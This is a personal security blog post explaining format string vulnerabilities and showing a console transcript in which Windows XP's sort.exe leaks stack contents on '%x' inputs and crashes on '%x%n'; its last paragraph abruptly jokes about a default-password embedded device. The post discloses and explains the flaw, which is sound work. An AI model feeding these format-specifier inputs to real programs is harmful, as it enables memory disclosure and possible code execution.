Well that was a long and unexpected blogging break. It started because I wanted to write a long and detailed post about the last BGP exploit when I realized how little most security people knew about BGP. Unfortunately I never had time, a bunch of other things demanded my attention, (like real life), and then once I got out of the habit of blogging, it was too easy to just ignore it. I’m back though, and I’ll try to blog regularly, albeit perhaps at a slower rate if real life persists in being as time consuming as its been lately.
Since this blog is coming back from a long hiatus, I think perhaps it’s appropriate to do so by bringing back an old vulnerability from a long hiatus as well. Format String Vulnerabilities have been around since around 1999. The short explanation is that when a C program doesn’t use format specifiers (you know, all those %s things you learned about way back when), but rather just prints a buffer directly, an attacker could put in format specifiers (like %x and %n). %x will just print the next hex number on the stack, so an attacker can view the stack. %n is more insidious – it is used to count the number of characters printed so far and copy that number into an arbitrary memory array. An attacker can use this to overwrite a given memory location (like, say, a return pointer) and execute arbitrary code.
In August of 2004 it was revealed that Windows’ sort.exe had a format string vulnerability. Like most people, I assumed that since the fix for this is trivial (just use a format specifier instead of printing the buffer directly), Microsoft would have fixed it in the next patch release or service pack. Lo and behold, they haven’t. This is a copy and paste from the command shell of my Windows XP machine.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\>ver
Microsoft Windows XP [Version 5.1.2600]
C:\>sort %x
7c812f39The system cannot find the file specified.
C:\>sort %x%x
7c812f390The system cannot find the file specified.
C:\>sort %x%x%x
7c812f3900The system cannot find the file specified.
C:\>sort %x%x%x%x
7c812f390078257825The system cannot find the file specified.
C:\>sort %x%x%x%x%x
7c812f39007825782578257825The system cannot find the file specified.
C:\>sort %x%n
(sort.exe crashes as I’ve tried to write data to some random place in memory)
Everyone knows that Microsoft has a reputation for not fixing vulnerabilities unless forced to, but this is bad even by their standards. 4+ years and they haven’t fixed a know format string vulnerability.
This looks like it could be a lot of fun. (You know, if someone were to try that. Not that I would ever participate in or condone such an activity). This just boils down to the fact that yet another embedded device has a default password on it that most people never change. The best protection in this case is probably to just lock the access panel.
